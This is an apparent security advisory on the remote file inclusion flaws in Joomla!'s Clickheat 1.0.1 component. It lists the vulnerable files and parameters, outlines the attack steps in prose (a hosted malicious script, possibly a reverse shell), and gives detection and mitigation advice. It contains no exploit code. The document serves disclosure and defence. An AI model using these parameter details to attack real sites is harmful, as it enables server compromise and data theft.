Source: cve@mitre.org
Multiple PHP remote file inclusion vulnerabilities in the Clickheat - Heatmap stats (com_clickheat) component 1.0.1 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) install.clickheat.php, (b) Cache.php and (c) Clickheat_Heatmap.php in Recly/Clickheat/, and (d) Recly/common/GlobalVariables.php; and the (2) mosConfig_absolute_path parameter to (e) _main.php and (f) main.php in includes/heatmap, and (g) includes/overview/main.php.
Clickheat, a Joomla! component, is vulnerable to multiple remote file inclusion (RFI) flaws. Attackers can leverage these vulnerabilities to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.
Step 1: Target Identification: The attacker identifies a Joomla! website using the Clickheat component (version 1.0.1).
Step 2: Payload Preparation: The attacker crafts a malicious PHP script, hosted on a server they control. This script could be designed to create a reverse shell, steal data, or perform other malicious actions.
Step 3: Payload Delivery: The attacker sends a specially crafted HTTP request to the vulnerable Joomla! website. The request targets one of the vulnerable files (e.g., install.clickheat.php, Cache.php, Clickheat_Heatmap.php, _main.php, main.php, or includes/overview/main.php). The request includes a URL in the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter, pointing to the attacker's malicious PHP script.
Step 4: Code Execution: The vulnerable Clickheat component, due to the lack of input validation, attempts to include the URL provided in the parameter. This causes the attacker's PHP script to be executed on the server.
Step 5: System Compromise: The attacker's PHP script executes, potentially granting them a shell, allowing them to upload and execute further malicious code, or exfiltrate sensitive data.
The vulnerability stems from insufficient input validation and sanitization within the Clickheat component. Specifically, the code fails to properly validate the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] parameters, which are used to construct file paths. This allows an attacker to inject a malicious URL pointing to a PHP script hosted on a remote server. When the vulnerable Clickheat component attempts to include this URL, the attacker's PHP code is executed within the context of the web server, granting them control over the server's resources. The root cause is a lack of secure coding practices, specifically the failure to sanitize user-supplied input before using it in file inclusion operations. This allows for the execution of arbitrary code.
While no specific APT groups are directly linked to this vulnerability, the ease of exploitation makes it attractive to a wide range of attackers, including script kiddies and opportunistic attackers. The potential for complete system compromise makes it a valuable target. CISA KEV status: Not Listed
Web server logs: Examine access logs for suspicious HTTP requests containing URLs in the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameters, especially those targeting the vulnerable files.
Intrusion Detection Systems (IDS): Implement rules to detect attempts to exploit the RFI vulnerability, looking for patterns in HTTP requests.
File Integrity Monitoring (FIM): Monitor critical system files for unauthorized modifications, especially those related to the Clickheat component.
Network Traffic Analysis: Analyze network traffic for unusual outbound connections from the web server, which could indicate a reverse shell or data exfiltration.
Upgrade: Update the Clickheat component to a patched version (if available). Since the component is old, this may not be possible. Consider removing the component if it is no longer needed.
Input Validation: Implement robust input validation and sanitization to prevent malicious code injection. Ensure that the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] parameters are properly validated before use.
File Inclusion Restrictions: Disable or restrict the use of file inclusion functions (e.g., include, require) if possible. If these functions are necessary, carefully control the allowed paths and file extensions.
Web Application Firewall (WAF): Deploy a WAF to filter malicious requests and block attempts to exploit the RFI vulnerability.
Least Privilege: Ensure the web server runs with the least privileges necessary to perform its functions. This limits the impact of a successful exploit.
Regular Security Audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities.